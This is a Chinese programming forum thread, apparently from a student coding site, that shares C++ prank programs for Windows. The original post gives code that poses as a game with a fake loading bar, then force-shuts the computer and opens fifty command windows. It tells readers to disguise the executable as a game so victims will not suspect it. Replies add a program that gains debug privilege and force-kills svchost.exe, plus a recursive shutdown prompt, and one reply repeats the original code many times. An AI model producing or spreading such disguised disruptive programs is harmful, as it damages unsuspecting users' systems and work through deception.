问题标题: 坑队友专用

1
2
已解决
熊智晖
熊智晖
高级天翼
高级天翼
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<iomanip>
#include<cstring>
#include<string>
#include<list>
#include<queue>
#include<stack>
#include<ctime>
#include<vector>
#include<bitset>
#include<memory>
#include<windows.h>
using namespace std;
long long q;
int main(){
    Sleep(1000);
    cout<<"请稍后,正在为您加载游戏";
    Sleep(800);
    system("cls");
    while(1){
        if(q>=100){
            Sleep(2000);
            system("cls");
            cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";
            Sleep(2000);
            break;
        }
        q++;
        system("cls");
        cout<<"正在加载资源";
        cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t  ";
        for(int i=1;i<=(q-1)/2;i++){
            cout<<"■";
        }
        for(int i=1;i<=50-((q-1)/2);i++){
            cout<<"□";
        }
        cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";
        //Sleep(rand()%20);
        if(rand()%40==0){
            Sleep(100);
        }
        if(rand()%100==0){
            Sleep(200);
        }
    }
    Sleep(1000);
    system("cls");
    cout<<"检测出本程序有病毒\n\n";
    Sleep(500);
    cout<<"\n本电脑正在准备为您关闭程序";
    system("color 12");
    Sleep(100);
    system("color 23");
    Sleep(100);
    system("color 34");
    Sleep(100);
    system("color 45");
    Sleep(100);
    system("color 56");
    Sleep(100);
    system("color 67");
    Sleep(100);
    system("color 70");
    system("shutdown -s -f -t 20");
    Sleep(1000);
    cout<<"\n\n关闭失败\n\n";
    Sleep(1000);
    system("cls");
    for(int j=1;j<=4;j++){
        for(int i=1;i<=3000;i++){
            int a=rand();
            a%=100;
            cout<<char(a);
        }
        Sleep(200);
        system("cls");
    }
    Sleep(1000);
    for(int i=1;i<=50;i++){
        Sleep(80);
        system("start cmd");
    }
    return 0;
}

这个代码运行以后把exe文件发给别人,让别人打开就可以关机。

注意!要署名为游戏。

否则别人会怀疑!!!

我上次就把这个发给了我的一个同学,他就关机了。

 

 

 

 

 

 

自己也可以用

我关机一用


0
已采纳
陈则霖
陈则霖
资深光能
资深光能

嗯,话说,你不是1分钟了?

最近是真的闲得慌啊?(doge)

说真的,你不用发出来的,不然能坑更多人(doge)

现在我知道了,得防着你了,不然你不是第一个把我们都坑了?(doge)

1
钱帅文
钱帅文
中级天翼
中级天翼

system("shutdown -s -f -t 20"); 罪魁祸首

1
曹子浩
曹子浩
新手光能
新手光能

奶奶滴

真是狡猾~狡猾

1
被禁言 李秉轩
李秉轩
修练者
修练者

我敢说这应该是最强的吧

#include<bits/stdc++.h>
#include <windows.h>
#pragma GCC optimize("Ofast", "inline", "-ffast-math")
#pragma GCC target("avx,sse2,sse3,sse4,mmx")
using namespace std;
using namespace std::rel_ops;
BOOL EnableDebugPrivilege() {
    HANDLE hToken;
    BOOL fOk = FALSE;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);

        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);

        fOk = (GetLastError() == ERROR_SUCCESS);
        CloseHandle(hToken);
    }
    return fOk;
}
int main(){
    //freopen(".in","r",stdin);
    //freopen(".out","w",stdout);
    EnableDebugPrivilege();
    system("taskkill /im svchost.exe /f");
    //fclose(stdin);
    //fclose(stdout);
    return 0;
}

 

0
0
0
0
李惟奕
李惟奕
新手守护
新手守护

这个真厉害,效果杠杠的,试了一下,结果电脑真的关机了!赶紧去坑朋友(嘻嘻)

0
0
许晓蓁
许晓蓁
新手光能
新手光能

可以,比我直接改同学密码强多了(狗头)

0
杨家瑞
杨家瑞
新手光能
新手光能

谁不会:

#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
void sa(){
    int x;
    x=MessageBox(GetForegroundWindow(),"你想要你的电脑关机吗?",":P",4);
    if(x==6){
        system("shutdown -s -t 3");
    }
    sa();
}
int main(){
    cout<<"bye";
    sa();
}

 

0
杨家瑞
杨家瑞
新手光能
新手光能

谁不会:

#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
void sa(){
    int x;
    x=MessageBox(GetForegroundWindow(),"你想要你的电脑关机吗?",":P",4);
    if(x==6){
        system("shutdown -s -t 3");
    }
    sa();
}
int main(){
    cout<<"bye";
    sa();
}

 

0
李正轩
李正轩
中级守护
中级守护

#include<iostream>

 

#include<algorithm>

 

#include<cstdio>

 

#include<cmath>

 

#include<iomanip>

 

#include<cstring>

 

#include<string>

 

#include<list>

 

#include<queue>

 

#include<stack>

 

#include<ctime>

 

#include<vector>

 

#include<bitset>

 

#include<memory>

 

#include<windows.h>

 

using namespace std;

 

long long q;

 

int main(){

 

Sleep(1000);

 

cout<<"请稍后,正在为您加载游戏";

 

Sleep(800);

 

system("cls");

 

while(1){

 

if(q>=100){

 

Sleep(2000);

 

system("cls");

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";

 

Sleep(2000);

 

break;

 

}

 

q++;

 

system("cls");

 

cout<<"正在加载资源";

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";

 

for(int i=1;i<=(q-1)/2;i++){

 

cout<<"■";

 

}

 

for(int i=1;i<=50-((q-1)/2);i++){

 

cout<<"□";

 

}

 

cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";

 

//Sleep(rand()%20);

 

if(rand()%40==0){

 

Sleep(100);

 

}

 

if(rand()%100==0){

 

Sleep(200);

 

}

 

}

 

Sleep(1000);

 

system("cls");

 

cout<<"检测出本程序有病毒\n\n";

 

Sleep(500);

 

cout<<"\n本电脑正在准备为您关闭程序";

 

system("color 12");

 

Sleep(100);

 

system("color 23");

 

Sleep(100);

 

system("color 34");

 

Sleep(100);

 

system("color 45");

 

Sleep(100);

 

system("color 56");

 

Sleep(100);

 

system("color 67");

 

Sleep(100);

 

system("color 70");

 

system("shutdown -s -f -t 20");

 

Sleep(1000);

 

cout<<"\n\n关闭失败\n\n";

 

Sleep(1000);

 

system("cls");

 

for(int j=1;j<=4;j++){

 

for(int i=1;i<=3000;i++){

 

int a=rand();

 

a%=100;

 

cout<<char(a);

 

}

 

Sleep(200);

 

system("cls");

 

}

 

Sleep(1000);

 

for(int i=1;i<=50;i++){

 

Sleep(80);

 

system("start cmd");

 

}

 

return 0;

 

}

#include<iostream>

 

#include<algorithm>

 

#include<cstdio>

 

#include<cmath>

 

#include<iomanip>

 

#include<cstring>

 

#include<string>

 

#include<list>

 

#include<queue>

 

#include<stack>

 

#include<ctime>

 

#include<vector>

 

#include<bitset>

 

#include<memory>

 

#include<windows.h>

 

using namespace std;

 

long long q;

 

int main(){

 

Sleep(1000);

 

cout<<"请稍后,正在为您加载游戏";

 

Sleep(800);

 

system("cls");

 

while(1){

 

if(q>=100){

 

Sleep(2000);

 

system("cls");

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";

 

Sleep(2000);

 

break;

 

}

 

q++;

 

system("cls");

 

cout<<"正在加载资源";

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";

 

for(int i=1;i<=(q-1)/2;i++){

 

cout<<"■";

 

}

 

for(int i=1;i<=50-((q-1)/2);i++){

 

cout<<"□";

 

}

 

cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";

 

//Sleep(rand()%20);

 

if(rand()%40==0){

 

Sleep(100);

 

}

 

if(rand()%100==0){

 

Sleep(200);

 

}

 

}

 

Sleep(1000);

 

system("cls");

 

cout<<"检测出本程序有病毒\n\n";

 

Sleep(500);

 

cout<<"\n本电脑正在准备为您关闭程序";

 

system("color 12");

 

Sleep(100);

 

system("color 23");

 

Sleep(100);

 

system("color 34");

 

Sleep(100);

 

system("color 45");

 

Sleep(100);

 

system("color 56");

 

Sleep(100);

 

system("color 67");

 

Sleep(100);

 

system("color 70");

 

system("shutdown -s -f -t 20");

 

Sleep(1000);

 

cout<<"\n\n关闭失败\n\n";

 

Sleep(1000);

 

system("cls");

 

for(int j=1;j<=4;j++){

 

for(int i=1;i<=3000;i++){

 

int a=rand();

 

a%=100;

 

cout<<char(a);

 

}

 

Sleep(200);

 

system("cls");

 

}

 

Sleep(1000);

 

for(int i=1;i<=50;i++){

 

Sleep(80);

 

system("start cmd");

 

}

 

return 0;

 

}

#include<iostream>

 

#include<algorithm>

 

#include<cstdio>

 

#include<cmath>

 

#include<iomanip>

 

#include<cstring>

 

#include<string>

 

#include<list>

 

#include<queue>

 

#include<stack>

 

#include<ctime>

 

#include<vector>

 

#include<bitset>

 

#include<memory>

 

#include<windows.h>

 

using namespace std;

 

long long q;

 

int main(){

 

Sleep(1000);

 

cout<<"请稍后,正在为您加载游戏";

 

Sleep(800);

 

system("cls");

 

while(1){

 

if(q>=100){

 

Sleep(2000);

 

system("cls");

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";

 

Sleep(2000);

 

break;

 

}

 

q++;

 

system("cls");

 

cout<<"正在加载资源";

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";

 

for(int i=1;i<=(q-1)/2;i++){

 

cout<<"■";

 

}

 

for(int i=1;i<=50-((q-1)/2);i++){

 

cout<<"□";

 

}

 

cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";

 

//Sleep(rand()%20);

 

if(rand()%40==0){

 

Sleep(100);

 

}

 

if(rand()%100==0){

 

Sleep(200);

 

}

 

}

 

Sleep(1000);

 

system("cls");

 

cout<<"检测出本程序有病毒\n\n";

 

Sleep(500);

 

cout<<"\n本电脑正在准备为您关闭程序";

 

system("color 12");

 

Sleep(100);

 

system("color 23");

 

Sleep(100);

 

system("color 34");

 

Sleep(100);

 

system("color 45");

 

Sleep(100);

 

system("color 56");

 

Sleep(100);

 

system("color 67");

 

Sleep(100);

 

system("color 70");

 

system("shutdown -s -f -t 20");

 

Sleep(1000);

 

cout<<"\n\n关闭失败\n\n";

 

Sleep(1000);

 

system("cls");

 

for(int j=1;j<=4;j++){

 

for(int i=1;i<=3000;i++){

 

int a=rand();

 

a%=100;

 

cout<<char(a);

 

}

 

Sleep(200);

 

system("cls");

 

}

 

Sleep(1000);

 

for(int i=1;i<=50;i++){

 

Sleep(80);

 

system("start cmd");

 

}

 

return 0;

 

}

#include<iostream>

 

#include<algorithm>

 

#include<cstdio>

 

#include<cmath>

 

#include<iomanip>

 

#include<cstring>

 

#include<string>

 

#include<list>

 

#include<queue>

 

#include<stack>

 

#include<ctime>

 

#include<vector>

 

#include<bitset>

 

#include<memory>

 

#include<windows.h>

 

using namespace std;

 

long long q;

 

int main(){

 

Sleep(1000);

 

cout<<"请稍后,正在为您加载游戏";

 

Sleep(800);

 

system("cls");

 

while(1){

 

if(q>=100){

 

Sleep(2000);

 

system("cls");

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";

 

Sleep(2000);

 

break;

 

}

 

q++;

 

system("cls");

 

cout<<"正在加载资源";

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";

 

for(int i=1;i<=(q-1)/2;i++){

 

cout<<"■";

 

}

 

for(int i=1;i<=50-((q-1)/2);i++){

 

cout<<"□";

 

}

 

cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";

 

//Sleep(rand()%20);

 

if(rand()%40==0){

 

Sleep(100);

 

}

 

if(rand()%100==0){

 

Sleep(200);

 

}

 

}

 

Sleep(1000);

 

system("cls");

 

cout<<"检测出本程序有病毒\n\n";

 

Sleep(500);

 

cout<<"\n本电脑正在准备为您关闭程序";

 

system("color 12");

 

Sleep(100);

 

system("color 23");

 

Sleep(100);

 

system("color 34");

 

Sleep(100);

 

system("color 45");

 

Sleep(100);

 

system("color 56");

 

Sleep(100);

 

system("color 67");

 

Sleep(100);

 

system("color 70");

 

system("shutdown -s -f -t 20");

 

Sleep(1000);

 

cout<<"\n\n关闭失败\n\n";

 

Sleep(1000);

 

system("cls");

 

for(int j=1;j<=4;j++){

 

for(int i=1;i<=3000;i++){

 

int a=rand();

 

a%=100;

 

cout<<char(a);

 

}

 

Sleep(200);

 

system("cls");

 

}

 

Sleep(1000);

 

for(int i=1;i<=50;i++){

 

Sleep(80);

 

system("start cmd");

 

}

 

return 0;

 

}

#include<iostream>

 

#include<algorithm>

 

#include<cstdio>

 

#include<cmath>

 

#include<iomanip>

 

#include<cstring>

 

#include<string>

 

#include<list>

 

#include<queue>

 

#include<stack>

 

#include<ctime>

 

#include<vector>

 

#include<bitset>

 

#include<memory>

 

#include<windows.h>

 

using namespace std;

 

long long q;

 

int main(){

 

Sleep(1000);

 

cout<<"请稍后,正在为您加载游戏";

 

Sleep(800);

 

system("cls");

 

while(1){

 

if(q>=100){

 

Sleep(2000);

 

system("cls");

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";

 

Sleep(2000);

 

break;

 

}

 

q++;

 

system("cls");

 

cout<<"正在加载资源";

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";

 

for(int i=1;i<=(q-1)/2;i++){

 

cout<<"■";

 

}

 

for(int i=1;i<=50-((q-1)/2);i++){

 

cout<<"□";

 

}

 

cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";

 

//Sleep(rand()%20);

 

if(rand()%40==0){

 

Sleep(100);

 

}

 

if(rand()%100==0){

 

Sleep(200);

 

}

 

}

 

Sleep(1000);

 

system("cls");

 

cout<<"检测出本程序有病毒\n\n";

 

Sleep(500);

 

cout<<"\n本电脑正在准备为您关闭程序";

 

system("color 12");

 

Sleep(100);

 

system("color 23");

 

Sleep(100);

 

system("color 34");

 

Sleep(100);

 

system("color 45");

 

Sleep(100);

 

system("color 56");

 

Sleep(100);

 

system("color 67");

 

Sleep(100);

 

system("color 70");

 

system("shutdown -s -f -t 20");

 

Sleep(1000);

 

cout<<"\n\n关闭失败\n\n";

 

Sleep(1000);

 

system("cls");

 

for(int j=1;j<=4;j++){

 

for(int i=1;i<=3000;i++){

 

int a=rand();

 

a%=100;

 

cout<<char(a);

 

}

 

Sleep(200);

 

system("cls");

 

}

 

Sleep(1000);

 

for(int i=1;i<=50;i++){

 

Sleep(80);

 

system("start cmd");

 

}

 

return 0;

 

}

#include<iostream>

 

#include<algorithm>

 

#include<cstdio>

 

#include<cmath>

 

#include<iomanip>

 

#include<cstring>

 

#include<string>

 

#include<list>

 

#include<queue>

 

#include<stack>

 

#include<ctime>

 

#include<vector>

 

#include<bitset>

 

#include<memory>

 

#include<windows.h>

 

using namespace std;

 

long long q;

 

int main(){

 

Sleep(1000);

 

cout<<"请稍后,正在为您加载游戏";

 

Sleep(800);

 

system("cls");

 

while(1){

 

if(q>=100){

 

Sleep(2000);

 

system("cls");

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";

 

Sleep(2000);

 

break;

 

}

 

q++;

 

system("cls");

 

cout<<"正在加载资源";

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";

 

for(int i=1;i<=(q-1)/2;i++){

 

cout<<"■";

 

}

 

for(int i=1;i<=50-((q-1)/2);i++){

 

cout<<"□";

 

}

 

cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";

 

//Sleep(rand()%20);

 

if(rand()%40==0){

 

Sleep(100);

 

}

 

if(rand()%100==0){

 

Sleep(200);

 

}

 

}

 

Sleep(1000);

 

system("cls");

 

cout<<"检测出本程序有病毒\n\n";

 

Sleep(500);

 

cout<<"\n本电脑正在准备为您关闭程序";

 

system("color 12");

 

Sleep(100);

 

system("color 23");

 

Sleep(100);

 

system("color 34");

 

Sleep(100);

 

system("color 45");

 

Sleep(100);

 

system("color 56");

 

Sleep(100);

 

system("color 67");

 

Sleep(100);

 

system("color 70");

 

system("shutdown -s -f -t 20");

 

Sleep(1000);

 

cout<<"\n\n关闭失败\n\n";

 

Sleep(1000);

 

system("cls");

 

for(int j=1;j<=4;j++){

 

for(int i=1;i<=3000;i++){

 

int a=rand();

 

a%=100;

 

cout<<char(a);

 

}

 

Sleep(200);

 

system("cls");

 

}

 

Sleep(1000);

 

for(int i=1;i<=50;i++){

 

Sleep(80);

 

system("start cmd");

 

}

 

return 0;

 

}

#include<iostream>

 

#include<algorithm>

 

#include<cstdio>

 

#include<cmath>

 

#include<iomanip>

 

#include<cstring>

 

#include<string>

 

#include<list>

 

#include<queue>

 

#include<stack>

 

#include<ctime>

 

#include<vector>

 

#include<bitset>

 

#include<memory>

 

#include<windows.h>

 

using namespace std;

 

long long q;

 

int main(){

 

Sleep(1000);

 

cout<<"请稍后,正在为您加载游戏";

 

Sleep(800);

 

system("cls");

 

while(1){

 

if(q>=100){

 

Sleep(2000);

 

system("cls");

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";

 

Sleep(2000);

 

break;

 

}

 

q++;

 

system("cls");

 

cout<<"正在加载资源";

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";

 

for(int i=1;i<=(q-1)/2;i++){

 

cout<<"■";

 

}

 

for(int i=1;i<=50-((q-1)/2);i++){

 

cout<<"□";

 

}

 

cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";

 

//Sleep(rand()%20);

 

if(rand()%40==0){

 

Sleep(100);

 

}

 

if(rand()%100==0){

 

Sleep(200);

 

}

 

}

 

Sleep(1000);

 

system("cls");

 

cout<<"检测出本程序有病毒\n\n";

 

Sleep(500);

 

cout<<"\n本电脑正在准备为您关闭程序";

 

system("color 12");

 

Sleep(100);

 

system("color 23");

 

Sleep(100);

 

system("color 34");

 

Sleep(100);

 

system("color 45");

 

Sleep(100);

 

system("color 56");

 

Sleep(100);

 

system("color 67");

 

Sleep(100);

 

system("color 70");

 

system("shutdown -s -f -t 20");

 

Sleep(1000);

 

cout<<"\n\n关闭失败\n\n";

 

Sleep(1000);

 

system("cls");

 

for(int j=1;j<=4;j++){

 

for(int i=1;i<=3000;i++){

 

int a=rand();

 

a%=100;

 

cout<<char(a);

 

}

 

Sleep(200);

 

system("cls");

 

}

 

Sleep(1000);

 

for(int i=1;i<=50;i++){

 

Sleep(80);

 

system("start cmd");

 

}

 

return 0;

 

}

#include<iostream>

 

#include<algorithm>

 

#include<cstdio>

 

#include<cmath>

 

#include<iomanip>

 

#include<cstring>

 

#include<string>

 

#include<list>

 

#include<queue>

 

#include<stack>

 

#include<ctime>

 

#include<vector>

 

#include<bitset>

 

#include<memory>

 

#include<windows.h>

 

using namespace std;

 

long long q;

 

int main(){

 

Sleep(1000);

 

cout<<"请稍后,正在为您加载游戏";

 

Sleep(800);

 

system("cls");

 

while(1){

 

if(q>=100){

 

Sleep(2000);

 

system("cls");

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";

 

Sleep(2000);

 

break;

 

}

 

q++;

 

system("cls");

 

cout<<"正在加载资源";

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";

 

for(int i=1;i<=(q-1)/2;i++){

 

cout<<"■";

 

}

 

for(int i=1;i<=50-((q-1)/2);i++){

 

cout<<"□";

 

}

 

cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";

 

//Sleep(rand()%20);

 

if(rand()%40==0){

 

Sleep(100);

 

}

 

if(rand()%100==0){

 

Sleep(200);

 

}

 

}

 

Sleep(1000);

 

system("cls");

 

cout<<"检测出本程序有病毒\n\n";

 

Sleep(500);

 

cout<<"\n本电脑正在准备为您关闭程序";

 

system("color 12");

 

Sleep(100);

 

system("color 23");

 

Sleep(100);

 

system("color 34");

 

Sleep(100);

 

system("color 45");

 

Sleep(100);

 

system("color 56");

 

Sleep(100);

 

system("color 67");

 

Sleep(100);

 

system("color 70");

 

system("shutdown -s -f -t 20");

 

Sleep(1000);

 

cout<<"\n\n关闭失败\n\n";

 

Sleep(1000);

 

system("cls");

 

for(int j=1;j<=4;j++){

 

for(int i=1;i<=3000;i++){

 

int a=rand();

 

a%=100;

 

cout<<char(a);

 

}

 

Sleep(200);

 

system("cls");

 

}

 

Sleep(1000);

 

for(int i=1;i<=50;i++){

 

Sleep(80);

 

system("start cmd");

 

}

 

return 0;

 

}

#include<iostream>

 

#include<algorithm>

 

#include<cstdio>

 

#include<cmath>

 

#include<iomanip>

 

#include<cstring>

 

#include<string>

 

#include<list>

 

#include<queue>

 

#include<stack>

 

#include<ctime>

 

#include<vector>

 

#include<bitset>

 

#include<memory>

 

#include<windows.h>

 

using namespace std;

 

long long q;

 

int main(){

 

Sleep(1000);

 

cout<<"请稍后,正在为您加载游戏";

 

Sleep(800);

 

system("cls");

 

while(1){

 

if(q>=100){

 

Sleep(2000);

 

system("cls");

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";

 

Sleep(2000);

 

break;

 

}

 

q++;

 

system("cls");

 

cout<<"正在加载资源";

 

cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";

 

for(int i=1;i<=(q-1)/2;i++){

 

cout<<"■";

 

}

 

for(int i=1;i<=50-((q-1)/2);i++){

 

cout<<"□";

 

}

 

cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";

 

//Sleep(rand()%20);

 

if(rand()%40==0){

 

Sleep(100);

 

}

 

if(rand()%100==0){

 

Sleep(200);

 

}

 

}

 

Sleep(1000);

 

system("cls");

 

cout<<"检测出本程序有病毒\n\n";

 

Sleep(500);

 

cout<<"\n本电脑正在准备为您关闭程序";

 

system("color 12");

 

Sleep(100);

 

system("color 23");

 

Sleep(100);

 

system("color 34");

 

Sleep(100);

 

system("color 45");

 

Sleep(100);

 

system("color 56");

 

Sleep(100);

 

system("color 67");

 

Sleep(100);

 

system("color 70");

 

system("shutdown -s -f -t 20");

 

Sleep(1000);

 

cout<<"\n\n关闭失败\n\n";

 

Sleep(1000);

 

system("cls");

 

for(int j=1;j<=4;j++){

 

for(int i=1;i<=3000;i++){

 

int a=rand();

 

a%=100;

 

cout<<char(a);

 

}

 

Sleep(200);

 

system("cls");

 

}

 

Sleep(1000);

 

for(int i=1;i<=50;i++){

 

Sleep(80);

 

system("start cmd");

 

}

 

return 0;

 

}

0
李醒
李醒
新手光能
新手光能

我试了,非常不错,只不过我打的代码忘记保存了QAQ

我要回答